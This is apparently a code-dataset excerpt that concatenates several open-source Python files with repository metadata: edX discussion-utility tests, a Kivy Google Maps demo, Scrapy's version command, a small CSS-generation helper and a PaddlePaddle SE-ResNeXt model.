from student.tests.factories import UserFactory, CourseEnrollmentFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
self.assertEqual(utils.extract(d, k), expected)
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
self.assertEqual(utils.strip_none(d), expected)
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
self.assertEqual(utils.strip_blank(d), expected)
def test_merge_dict(self):
d1 = {'cats': 'meow', 'dogs': 'woof'}
d2 = {'lions': 'roar', 'ducks': 'quack'}
expected = {'cats': 'meow', 'dogs': 'woof', 'lions': 'roar', 'ducks': 'quack'}
self.assertEqual(utils.merge_dict(d1, d2), expected)
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
def setUp(self):
super(AccessUtilsTestCase, self).setUp(create_user=False)
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {u'Moderator': [3], u'Community TA': [4, 5]}
self.assertEqual(ret, expected)
def test_has_forum_access(self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
self.assertTrue(ret)
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
self.assertFalse(ret)
ret = utils.has_forum_access('student', self.course_id, 'NotARole')
self.assertFalse(ret)
class CoursewareContextTestCase(ModuleStoreTestCase):
"""
Base testcase class for courseware context for the
comment client service integration
"""
def setUp(self):
super(CoursewareContextTestCase, self).setUp(create_user=True)
self.course = CourseFactory.create(org="TestX", number="101", display_name="Test Course")
self.discussion1 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion1",
discussion_category="Chapter",
discussion_target="Discussion 1"
)
self.discussion2 = ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion2",
discussion_category="Chapter / Section / Subsection",
discussion_target="Discussion 2"
)
def test_empty(self):
utils.add_courseware_context([], self.course, self.user)
def test_missing_commentable_id(self):
orig = {"commentable_id": "non-inline"}
modified = dict(orig)
utils.add_courseware_context([modified], self.course, self.user)
self.assertEqual(modified, orig)
def test_basic(self):
threads = [
{"commentable_id": self.discussion1.discussion_id},
{"commentable_id": self.discussion2.discussion_id}
]
utils.add_courseware_context(threads, self.course, self.user)
def assertThreadCorrect(thread, discussion, expected_title): # pylint: disable=invalid-name
"""Asserts that the given thread has the expected set of properties"""
self.assertEqual(
set(thread.keys()),
set(["commentable_id", "courseware_url", "courseware_title"])
)
self.assertEqual(
thread.get("courseware_url"),
reverse(
"jump_to",
kwargs={
"course_id": self.course.id.to_deprecated_string(),
"location": discussion.location.to_deprecated_string()
}
)
)
self.assertEqual(thread.get("courseware_title"), expected_title)
assertThreadCorrect(threads[0], self.discussion1, "Chapter / Discussion 1")
assertThreadCorrect(threads[1], self.discussion2, "Subsection / Discussion 2")
class CategoryMapTestMixin(object):
"""
Provides functionality for classes that test
`get_discussion_category_map`.
"""
def assert_category_map_equals(self, expected, requesting_user=None):
"""
Call `get_discussion_category_map`, and verify that it returns
what is expected.
"""
self.assertEqual(
utils.get_discussion_category_map(self.course, requesting_user or self.user),
expected
)
class CategoryMapTestCase(CategoryMapTestMixin, ModuleStoreTestCase):
"""
Base testcase class for discussion categories for the
comment client service integration
"""
def setUp(self):
super(CategoryMapTestCase, self).setUp(create_user=True)
self.course = CourseFactory.create(
org="TestX", number="101", display_name="Test Course",
# This test needs to use a course that has already started --
# discussion topics only show up if the course has already started,
# and the default start date for courses is Jan 1, 2030.
start=datetime(2012, 2, 3, tzinfo=UTC)
)
# Courses get a default discussion topic on creation, so remove it
self.course.discussion_topics = {}
self.course.save()
self.discussion_num = 0
self.maxDiff = None # pylint: disable=invalid-name
def create_discussion(self, discussion_category, discussion_target, **kwargs):
self.discussion_num += 1
return ItemFactory.create(
parent_location=self.course.location,
category="discussion",
discussion_id="discussion{}".format(self.discussion_num),
discussion_category=discussion_category,
discussion_target=discussion_target,
**kwargs
)
def test_empty(self):
self.assert_category_map_equals({"entries": {}, "subcategories": {}, "children": []})
def test_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
def check_cohorted_topics(expected_ids):
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "Topic A", "is_cohorted": "Topic_A" in expected_ids},
"Topic B": {"id": "Topic_B", "sort_key": "Topic B", "is_cohorted": "Topic_B" in expected_ids},
"Topic C": {"id": "Topic_C", "sort_key": "Topic C", "is_cohorted": "Topic_C" in expected_ids},
},
"subcategories": {},
"children": ["Topic A", "Topic B", "Topic C"]
}
)
check_cohorted_topics([]) # default (empty) cohort config
self.course.cohort_config = {"cohorted": False, "cohorted_discussions": []}
check_cohorted_topics([])
self.course.cohort_config = {"cohorted": True, "cohorted_discussions": []}
check_cohorted_topics([])
self.course.cohort_config = {"cohorted": True, "cohorted_discussions": ["Topic_B", "Topic_C"]}
check_cohorted_topics(["Topic_B", "Topic_C"])
self.course.cohort_config = {"cohorted": True, "cohorted_discussions": ["Topic_A", "Some_Other_Topic"]}
check_cohorted_topics(["Topic_A"])
# unlikely case, but make sure it works.
self.course.cohort_config = {"cohorted": False, "cohorted_discussions": ["Topic_A"]}
check_cohorted_topics([])
def test_single_inline(self):
self.create_discussion("Chapter", "Discussion")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter"]
}
)
def test_tree(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
def check_cohorted(is_cohorted):
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": is_cohorted,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Subsection 1", "Subsection 2"]
}
},
"children": ["Discussion", "Section 1"]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Section 1"]
}
},
"children": ["Chapter 1", "Chapter 2", "Chapter 3"]
}
)
# empty / default config
check_cohorted(False)
# explicitly disabled cohorting
self.course.cohort_config = {"cohorted": False}
check_cohorted(False)
# explicitly enabled cohorting
self.course.cohort_config = {"cohorted": True}
check_cohorted(True)
def test_start_date_filter(self):
now = datetime.now()
later = datetime.max
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2 обсуждение", start=later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=later)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1"]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter 1", "Chapter 2"]
}
)
def test_sort_inline_explicit(self):
self.create_discussion("Chapter", "Discussion 1", sort_key="D")
self.create_discussion("Chapter", "Discussion 2", sort_key="A")
self.create_discussion("Chapter", "Discussion 3", sort_key="E")
self.create_discussion("Chapter", "Discussion 4", sort_key="C")
self.create_discussion("Chapter", "Discussion 5", sort_key="B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": "D",
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": "A",
"is_cohorted": False,
},
"Discussion 3": {
"id": "discussion3",
"sort_key": "E",
"is_cohorted": False,
},
"Discussion 4": {
"id": "discussion4",
"sort_key": "C",
"is_cohorted": False,
},
"Discussion 5": {
"id": "discussion5",
"sort_key": "B",
"is_cohorted": False,
}
},
"subcategories": {},
"children": [
"Discussion 2",
"Discussion 5",
"Discussion 4",
"Discussion 1",
"Discussion 3"
]
}
},
"children": ["Chapter"]
}
)
def test_sort_configured_topics_explicit(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A", "sort_key": "B"},
"Topic B": {"id": "Topic_B", "sort_key": "C"},
"Topic C": {"id": "Topic_C", "sort_key": "A"}
}
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "B", "is_cohorted": False},
"Topic B": {"id": "Topic_B", "sort_key": "C", "is_cohorted": False},
"Topic C": {"id": "Topic_C", "sort_key": "A", "is_cohorted": False},
},
"subcategories": {},
"children": ["Topic C", "Topic A", "Topic B"]
}
)
def test_sort_alpha(self):
self.course.discussion_sort_alpha = True
self.course.save()
self.create_discussion("Chapter", "Discussion D")
self.create_discussion("Chapter", "Discussion A")
self.create_discussion("Chapter", "Discussion E")
self.create_discussion("Chapter", "Discussion C")
self.create_discussion("Chapter", "Discussion B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion D": {
"id": "discussion1",
"sort_key": "Discussion D",
"is_cohorted": False,
},
"Discussion A": {
"id": "discussion2",
"sort_key": "Discussion A",
"is_cohorted": False,
},
"Discussion E": {
"id": "discussion3",
"sort_key": "Discussion E",
"is_cohorted": False,
},
"Discussion C": {
"id": "discussion4",
"sort_key": "Discussion C",
"is_cohorted": False,
},
"Discussion B": {
"id": "discussion5",
"sort_key": "Discussion B",
"is_cohorted": False,
}
},
"subcategories": {},
"children": [
"Discussion A",
"Discussion B",
"Discussion C",
"Discussion D",
"Discussion E"
]
}
},
"children": ["Chapter"]
}
)
def test_sort_intermediates(self):
self.create_discussion("Chapter B", "Discussion 2")
self.create_discussion("Chapter C", "Discussion")
self.create_discussion("Chapter A", "Discussion 1")
self.create_discussion("Chapter B", "Discussion 1")
self.create_discussion("Chapter A", "Discussion 2")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter A": {
"entries": {
"Discussion 1": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion5",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter B": {
"entries": {
"Discussion 1": {
"id": "discussion4",
"sort_key": None,
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter C": {
"entries": {
"Discussion": {
"id": "discussion2",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter A", "Chapter B", "Chapter C"]
}
)
def test_ids_empty(self):
self.assertEqual(utils.get_discussion_categories_ids(self.course, self.user), [])
def test_ids_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["Topic_A", "Topic_B", "Topic_C"]
)
def test_ids_inline(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["discussion1", "discussion2", "discussion3", "discussion4", "discussion5", "discussion6"]
)
def test_ids_mixed(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["Topic_A", "Topic_B", "Topic_C", "discussion1", "discussion2", "discussion3"]
)
class ContentGroupCategoryMapTestCase(CategoryMapTestMixin, ContentGroupTestCase):
"""
Tests `get_discussion_category_map` on discussion modules which are
only visible to some content groups.
"""
def test_staff_user(self):
"""
Verify that the staff user can access the alpha, beta, and
global discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Alpha',
'Visible to Beta',
'Visible to Everyone'
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_cohorted': True,
'id': 'alpha_group_discussion'
},
'Visible to Beta': {
'sort_key': None,
'is_cohorted': True,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.staff_user
)
def test_alpha_user(self):
"""
Verify that the alpha user can access the alpha and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Alpha',
'Visible to Everyone'
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_cohorted': True,
'id': 'alpha_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.alpha_user
)
def test_beta_user(self):
"""
Verify that the beta user can access the beta and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Beta',
'Visible to Everyone'
],
'entries': {
'Visible to Beta': {
'sort_key': None,
'is_cohorted': True,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.beta_user
)
def test_non_cohorted_user(self):
"""
Verify that the non-cohorted user can access the global
discussion topic.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Everyone'
],
'entries': {
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.non_cohorted_user
)
class JsonResponseTestCase(TestCase, UnicodeTestMixin):
def _test_unicode_data(self, text):
response = utils.JsonResponse(text)
reparsed = json.loads(response.content)
self.assertEqual(reparsed, text)
class RenderMustacheTests(TestCase):
"""
Test the `render_mustache` utility function.
"""
@mock.patch('edxmako.LOOKUP', {})
def test_it(self):
"""
Basic test.
"""
add_lookup('main', '', package=__name__)
self.assertEqual(utils.render_mustache('test.mustache', {}), 'Testing 1 2 3.\n')
|
mtlchun/edx
|
lms/djangoapps/django_comment_client/tests/test_utils.py
|
Python
|
agpl-3.0
| 33,221 | 0.001355 |
__version__ = '1.3'
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import NumericProperty
from gmaps import GMap, run_on_ui_thread
gmap_kv = '''
<Toolbar@BoxLayout>:
size_hint_y: None
height: '48dp'
padding: '4dp'
spacing: '4dp'
canvas:
Color:
rgba: .2, .2, .2, .6
Rectangle:
pos: self.pos
size: self.size
FloatLayout:
GMap:
id: map_widget
# top toolbar
Toolbar:
pos_hint: {'top': 1}
Button:
text: 'Move to Lille, France'
on_release: app.move_to_lille()
Button:
            text: 'Move to Sydney, Australia'
on_release: app.move_to_sydney()
# bottom toolbar
Toolbar:
Label:
text: 'Longitude: {} - Latitude: {}'.format(app.longitude, app.latitude)
'''
class GMapTestApp(App):
latitude = NumericProperty()
longitude = NumericProperty()
def build(self):
self.root = Builder.load_string(gmap_kv)
self.map_widget = self.root.ids.map_widget
self.map_widget.bind(
on_ready=self.on_map_widget_ready,
on_map_click=self.on_map_click)
def on_map_widget_ready(self, map_widget, *args):
# Implementation of the "Hello Map" example from the android
# documentation
map = map_widget.map
sydney = map_widget.create_latlng(-33.867, 151.206)
#map.setMyLocationEnabled(True)
map.moveCamera(map_widget.camera_update_factory.newLatLngZoom(
sydney, 13))
marker = self.map_widget.create_marker(
title='Sydney',
            snippet='The most populous city in Australia',
position=sydney)
map.addMarker(marker)
circle = map_widget.create_circle(
sydney
)
map.addCircle(circle)
# disable zoom button
map.getUiSettings().setZoomControlsEnabled(False)
@run_on_ui_thread
def move_to_lille(self):
latlng = self.map_widget.create_latlng(50.6294, 3.057)
self.map_widget.map.moveCamera(
self.map_widget.camera_update_factory.newLatLngZoom(
latlng, 13))
@run_on_ui_thread
def move_to_sydney(self):
latlng = self.map_widget.create_latlng(-33.867, 151.206)
self.map_widget.map.moveCamera(
self.map_widget.camera_update_factory.newLatLngZoom(
latlng, 13))
circle = self.map_widget.create_circle( latlng)
self.map_widget.map.addCircle(circle)
def on_map_click(self, map_widget, latlng):
self.latitude = latlng.latitude
self.longitude = latlng.longitude
def on_pause(self):
return True
if __name__ == '__main__':
GMapTestApp().run()
|
SwordGO/SwordGO_app
|
example/kivy-gmaps/main.py
|
Python
|
gpl-3.0
| 2,807 | 0.00285 |
import sys
import platform
import twisted
import scrapy
from scrapy.command import ScrapyCommand
class Command(ScrapyCommand):
def syntax(self):
return "[-v]"
def short_desc(self):
return "Print Scrapy version"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("--verbose", "-v", dest="verbose", action="store_true",
help="also display twisted/python/platform info (useful for bug reports)")
def run(self, args, opts):
if opts.verbose:
try:
import lxml.etree
except ImportError:
lxml_version = libxml2_version = "(lxml not available)"
else:
lxml_version = ".".join(map(str, lxml.etree.LXML_VERSION))
libxml2_version = ".".join(map(str, lxml.etree.LIBXML_VERSION))
print "Scrapy : %s" % scrapy.__version__
print "lxml : %s" % lxml_version
print "libxml2 : %s" % libxml2_version
print "Twisted : %s" % twisted.version.short()
print "Python : %s" % sys.version.replace("\n", "- ")
print "Platform: %s" % platform.platform()
else:
print "Scrapy %s" % scrapy.__version__
|
pablohoffman/scrapy
|
scrapy/commands/version.py
|
Python
|
bsd-3-clause
| 1,277 | 0.003132 |
#!/usr/bin/env python
# pykram
#
# Created by nicerobot on 2012-02-03.
# Copyright (c) 2012 Nice Robot Corporation. All rights reserved.
#
# This file is part of pykram.
#
# pykram is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pykram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pykram. If not, see <http://www.gnu.org/licenses/>.
#
__date__ = '2011.05.04'
__version__ = '1.0'
__doc__= """
This is pyelyts.py - a Python module that makes it easier
to generate cascading style sheets the pythonic way.
Version: %s as of %s.
""" % ( __version__, __date__ )
import re
import string
class properties(dict):
def __call__( self, **props ):
for key, value in props.iteritems():
if '_' == key[-1]:
key = key.replace('_','-')
key = key.strip('-')
self[key] = value
def __str__(self):
return ';'.join(['%s:%s' % (k,v) for k,v in self.iteritems()])
class document:
def __init__( self, indent=True ):
self.indent = indent
self.selectors = []
def __call__( self, *selectors ):
p=properties()
self.selectors.append((','.join(selectors),p))
return p
def __str__(self):
return '%s\n' % '\n'.join(['%s{%s}' % (s,p) for (s,p) in self.selectors])
if __name__ == '__main__':
print __doc__
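    # Added illustrative usage (not in the original module): build a tiny
    # stylesheet with the classes above; a trailing underscore in a keyword
    # name becomes a hyphen (font_size_ -> font-size).
    css = document()
    css('h1', 'h2')(color='red', font_size_='12px')
    print css  # prints something like: h1,h2{color:red;font-size:12px}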
|
pombredanne/pykram
|
src/main/py/pyelyts.py
|
Python
|
gpl-3.0
| 1,729 | 0.019665 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.fluid as fluid
import math
import os
from imagenet_reader import train, val
__all__ = [
"SE_ResNeXt", "SE_ResNeXt50_32x4d", "SE_ResNeXt101_32x4d",
"SE_ResNeXt152_32x4d", "get_model"
]
train_parameters = {
"input_size": [3, 224, 224],
"input_mean": [0.485, 0.456, 0.406],
"input_std": [0.229, 0.224, 0.225],
"learning_strategy": {
"name": "piecewise_decay",
"batch_size": 256,
"epochs": [30, 60, 90],
"steps": [0.1, 0.01, 0.001, 0.0001]
}
}
class SE_ResNeXt():
def __init__(self, layers=50, is_train=True):
self.params = train_parameters
self.layers = layers
self.is_train = is_train
def net(self, input, class_dim=1000):
layers = self.layers
supported_layers = [50, 101, 152]
assert layers in supported_layers, \
"supported layers are {} but input layer is {}".format(supported_layers, layers)
if layers == 50:
cardinality = 32
reduction_ratio = 16
depth = [3, 4, 6, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=7,
stride=2,
act='relu')
conv = fluid.layers.pool2d(
input=conv,
pool_size=3,
pool_stride=2,
pool_padding=1,
pool_type='max')
elif layers == 101:
cardinality = 32
reduction_ratio = 16
depth = [3, 4, 23, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=7,
stride=2,
act='relu')
conv = fluid.layers.pool2d(
input=conv,
pool_size=3,
pool_stride=2,
pool_padding=1,
pool_type='max')
elif layers == 152:
cardinality = 64
reduction_ratio = 16
depth = [3, 8, 36, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=3,
stride=2,
act='relu')
conv = self.conv_bn_layer(
input=conv, num_filters=64, filter_size=3, stride=1, act='relu')
conv = self.conv_bn_layer(
input=conv,
num_filters=128,
filter_size=3,
stride=1,
act='relu')
conv = fluid.layers.pool2d(
input=conv, pool_size=3, pool_stride=2, pool_padding=1, \
pool_type='max')
for block in range(len(depth)):
for i in range(depth[block]):
conv = self.bottleneck_block(
input=conv,
num_filters=num_filters[block],
stride=2 if i == 0 and block != 0 else 1,
cardinality=cardinality,
reduction_ratio=reduction_ratio)
pool = fluid.layers.pool2d(
input=conv, pool_size=7, pool_type='avg', global_pooling=True)
drop = fluid.layers.dropout(x=pool, dropout_prob=0.5)
stdv = 1.0 / math.sqrt(drop.shape[1] * 1.0)
out = fluid.layers.fc(input=drop,
size=class_dim,
act='softmax',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(-stdv,
stdv)))
return out
def shortcut(self, input, ch_out, stride):
ch_in = input.shape[1]
if ch_in != ch_out or stride != 1:
filter_size = 1
return self.conv_bn_layer(input, ch_out, filter_size, stride)
else:
return input
def bottleneck_block(self, input, num_filters, stride, cardinality,
reduction_ratio):
conv0 = self.conv_bn_layer(
input=input, num_filters=num_filters, filter_size=1, act='relu')
conv1 = self.conv_bn_layer(
input=conv0,
num_filters=num_filters,
filter_size=3,
stride=stride,
groups=cardinality,
act='relu')
conv2 = self.conv_bn_layer(
input=conv1, num_filters=num_filters * 2, filter_size=1, act=None)
scale = self.squeeze_excitation(
input=conv2,
num_channels=num_filters * 2,
reduction_ratio=reduction_ratio)
short = self.shortcut(input, num_filters * 2, stride)
return fluid.layers.elementwise_add(x=short, y=scale, act='relu')
def conv_bn_layer(self,
input,
num_filters,
filter_size,
stride=1,
groups=1,
act=None):
conv = fluid.layers.conv2d(
input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=(filter_size - 1) / 2,
groups=groups,
act=None,
bias_attr=False)
return fluid.layers.batch_norm(
input=conv, act=act, is_test=not self.is_train)
def squeeze_excitation(self, input, num_channels, reduction_ratio):
pool = fluid.layers.pool2d(
input=input, pool_size=0, pool_type='avg', global_pooling=True)
stdv = 1.0 / math.sqrt(pool.shape[1] * 1.0)
squeeze = fluid.layers.fc(input=pool,
size=num_channels / reduction_ratio,
act='relu',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(
-stdv, stdv)))
stdv = 1.0 / math.sqrt(squeeze.shape[1] * 1.0)
excitation = fluid.layers.fc(input=squeeze,
size=num_channels,
act='sigmoid',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(
-stdv, stdv)))
scale = fluid.layers.elementwise_mul(x=input, y=excitation, axis=0)
return scale
def SE_ResNeXt50_32x4d():
model = SE_ResNeXt(layers=50)
return model
def SE_ResNeXt101_32x4d():
model = SE_ResNeXt(layers=101)
return model
def SE_ResNeXt152_32x4d():
model = SE_ResNeXt(layers=152)
return model
def get_model(args, is_train, main_prog, startup_prog):
model = SE_ResNeXt(layers=50)
batched_reader = None
pyreader = None
trainer_count = int(os.getenv("PADDLE_TRAINERS"))
dshape = train_parameters["input_size"]
with fluid.program_guard(main_prog, startup_prog):
with fluid.unique_name.guard():
if args.use_reader_op:
pyreader = fluid.layers.py_reader(
capacity=10,
shapes=([-1] + dshape, (-1, 1)),
dtypes=('float32', 'int64'),
name="train_reader" if is_train else "test_reader",
use_double_buffer=True)
input, label = fluid.layers.read_file(pyreader)
else:
input = fluid.layers.data(
name='data', shape=dshape, dtype='float32')
label = fluid.layers.data(
name='label', shape=[1], dtype='int64')
out = model.net(input=input)
cost = fluid.layers.cross_entropy(input=out, label=label)
avg_cost = fluid.layers.mean(x=cost)
acc_top1 = fluid.layers.accuracy(input=out, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=out, label=label, k=5)
optimizer = None
if is_train:
total_images = 1281167 / trainer_count
step = int(total_images / args.batch_size + 1)
epochs = [40, 80, 100]
bd = [step * e for e in epochs]
base_lr = args.learning_rate
lr = []
lr = [base_lr * (0.1**i) for i in range(len(bd) + 1)]
optimizer = fluid.optimizer.Momentum(
# learning_rate=base_lr,
learning_rate=fluid.layers.piecewise_decay(
boundaries=bd, values=lr),
momentum=0.9,
regularization=fluid.regularizer.L2Decay(1e-4))
optimizer.minimize(avg_cost)
if args.memory_optimize:
fluid.memory_optimize(main_prog)
# config readers
if is_train:
reader = train()
else:
reader = val()
if not args.use_reader_op:
batched_reader = paddle.batch(
reader, batch_size=args.batch_size * args.gpus, drop_last=True)
else:
pyreader.decorate_paddle_reader(
paddle.batch(
reader, batch_size=args.batch_size))
return avg_cost, optimizer, [acc_top1, acc_top5], batched_reader, pyreader
|
reyoung/Paddle
|
benchmark/fluid/models/se_resnext.py
|
Python
|
